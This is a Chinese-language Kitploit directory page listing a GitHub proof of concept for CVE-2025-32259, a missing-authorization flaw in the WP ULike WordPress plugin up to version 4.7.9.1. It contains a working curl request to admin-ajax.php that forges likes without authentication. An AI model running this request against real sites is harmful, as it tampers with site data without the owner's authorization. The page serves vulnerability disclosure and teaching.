Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
wp-ulike-cve-2025-32259-poc — 在受影响的WP ULike插件版本中,在允许某些AJAX操作或投票操作之前没有适当的授权检查。这允许未经认证的用户以只有登录用户才能进行的方式与插件交互——可能扭曲投票或注入误导性数据。 | Kitploit
工具/GitHubGitHub/hossameahmed/wp-ulike-cve-2025-32259-poc
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育
GitHubhossameahmed/wp-ulike-cve-2025-32259-poc

wp-ulike-cve-2025-32259-poc

在受影响的WP ULike插件版本中,在允许某些AJAX操作或投票操作之前没有适当的授权检查。这允许未经认证的用户以只有登录用户才能进行的方式与插件交互——可能扭曲投票或注入误导性数据。

查看仓库

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
1年前尚未审核
分享

WP ULike ≤ 4.7.9.1 - 未授权内容伪造 (CVE-2025-32259)

🔬 展示 WP ULike WordPress 插件中 CVE-2025-32259 的简单 PoC。
🚨 仅供教育用途 – 未经明确授权请勿在系统上测试。


🧠 概述

WP ULike 是一个流行的 WordPress 插件,允许用户点赞站点内容。版本 4.7.9.1 及以下存在缺少授权漏洞,允许未认证用户通过 AJAX 请求伪造“点赞”操作。

  • CVE: CVE-2025-32259
  • 受影响版本: ≤ 4.7.9.1
  • 修复版本: 4.7.9.2

🚀 概念验证

该漏洞允许未认证用户与 AJAX 端点交互,并在未经许可的情况下点赞任何内容(文章、评论等)。

🔧 PoC 脚本

curl -X POST https://target-site.com/wp-admin/admin-ajax.php \
  -d "action=wp_ulike_process" \
  -d "method=likeThis" \
  -d "id=1" \
  -d "type=post" \
  -d "nonce=" \
  -H "Content-Type: application/x-www-form-urlencoded"

将 id=1 替换为有效的文章 ID。

成功响应可能类似于: {"status":"success","msg":"You liked this."}

下载工具